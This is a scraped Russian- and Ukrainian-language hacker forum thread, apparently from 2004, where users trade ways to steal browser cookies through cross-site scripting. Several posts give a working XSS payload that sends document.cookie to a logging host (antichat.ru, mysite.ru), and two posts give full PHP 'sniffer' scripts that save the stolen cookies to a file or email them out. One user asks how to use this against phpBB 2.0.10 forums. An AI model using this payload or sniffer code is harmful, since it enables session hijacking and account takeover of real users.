|
Вопрос про отправку кук на сниффер http://antichat.ru/cgi-bin/s.jpg?
Я конечно дико извиняюсь за свое ламерство, но скажите мне пожалуйста вот что:
Что мне нужно ставить после http://antichat.ru/cgi-bin/s.jpg? чтобы он отправил мне куки? (+document.cookie не катит...или я совсем дурак =( т.е. сниффер прокатывает, лог ведется, а куки не отправляются |
В примерах же описано
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> [/QUOTE]<span id='postcolor'> |
че то вот эта связка как раз и не работает. Я тестил так: создал док. на локальном компе и сам же туда и зашел. В логах отобразилось что я там был, но куков не отправилось
|
Парень, почитай что такое куки вообще.... А потом уже задавай вопросы...
|
Liss, с помощью джаваскрипта можно получить кукисы только текущего документа ...
Если вставить сниффер, например, на главную страничку античата, то содержимое кукисов будет: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> hotlog=1; hotlog=1 [/QUOTE]<span id='postcolor'> Это кукисы счетчика хотлог ... Как видишь, куки от mail.ru здесь не фигурируют ... http://forum.antichat.ru/iB_html/non...icons/wink.gif |
проще говоря
для каждого домена свои куки соответственно, в каком домене исполняется JavaScript к тем кукам он и имеет доступ |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июля 23 2004,19:28)</td></tr><tr><td id="QUOTE">В примерах же описано
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> [/QUOTE]<span id='postcolor'>[/QUOTE]<span id='postcolor'> Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non...ticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють... |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (жека @ октября 10 2004,17:12)</td></tr><tr><td id="QUOTE">Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non...ticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE]<span id='postcolor'>
Что бы мы все тут делали, если бы это было так легко рассказать? )) Это ж искусство)) |
А это че озназает - img = new Image();
Скажите Пллиз !!! |
переменной img присваевается талько что созданный экземпляр объекта класса Image
ну короче картинка с именем img создается по простому |
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+d...lt;/script>
а на пшп какой функцией получить куки ? например есть <? $adr = "".getenv("HTTP_REFERER").&quo t;"; print $adr ?> что нужно добавить ? |
$_COOKIE["переменная"];
или массив implode('', $_COOKIE); |
спасибо тебе
|
чтото неполучаеться у меня...можеш написать код пожалуйста ?
|
если ты имеешь ввиду код снифера, то вот
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><? $filename = 'sniff.txt'; $somecontent = date("l dS of F Y h:i:s A") . "\r\nSERVER_ADDR = " . $_SERVER["SERVER_ADDR"] . (isset($_SERVER["HTTP_REFERER"]) ? "\r\nHTTP_REFERER = " . $_SERVER["HTTP_REFERER"] : '') . "\r\nQUERY_STRING = " . $_SERVER["QUERY_STRING"] . "\r\n\r\n"; mail('mail@addr.com', 'sniff', $somecontent); // Let's make sure the file exists and is writable first. if (is_writable($filename)) { // In our example we're opening $filename in append mode. // The file pointer is at the bottom of the file hence // that's where $somecontent will go when we fwrite() it. if (!$handle = fopen($filename, 'a')) { echo "Cannot open file ($filename)"; exit; } // Write $somecontent to our opened file. if (fwrite($handle, $somecontent) === FALSE) { echo "Cannot write to file ($filename)"; exit; } //echo "Success, wrote ($somecontent) to file ($filename)"; fclose($handle); } else { echo "The file $filename is not writable"; } ?>[/QUOTE]<span id='postcolor'> |
спасибо...пригодиться...но этот снифер не тянет куки
|
этот снифер тянет все что ему дать
а куки можно утянуть только одним способом ...='http://.../1.php?'+document.cookie т.е. через QUERY_STRING |
2salop
Тянуть куки пхп-шным $_COOKIE["переменная"]; бесполезно, поскольку так ты получишь совсем не те куки, на которые рассчитываешь)) |
А как этим сниффером можно потянуть куки phpbb2.0.10?
Если вставлять через [img] как картинку,то в логах фиксируется только ip и урл.Есть какие-нибудь способы? |
Цитата:
Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non...ticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE] Ой не могу =))) сердце аж прихватило =)))) я плакаль |
Цитата:
Шановний, а ви не могли б розповісти, як вставити ЦЕ в повідомлення, якщо на форумі нема тегу [video] (не знаю чому http://forum.antichat.ru/iB_html/non...ticons/sad.gif )? Будь-ласка, без жаргону, а то ламери типу мене не розуміють...[/QUOTE] Ой не могу =))) сердце аж прихватило =)))) я плакаль[/QUOTE] 4ому, зви4айнісенький собі пост, тільки для тупих ламерів :))) |
я например юзаю свой простейший сниффер, snif.php:
<? if (!empty($_GET['id'])) { $b="\n---beginning---\n"; $id=$_GET['id']; $e="\n------end------"; $p=fopen("c.txt","a"); fputs($p,$b); fputs($p,$id); fputs($p,$e); fclose($p); echo "<script>window.close();</script>"; } else echo "\nUnknown error!"; ?> а потом вставляю такой javascript: <script>img = new Image(); img.src = "http://mysite.ru/snif.php?id="+document.cookie;</script> |
| Время: 04:55 |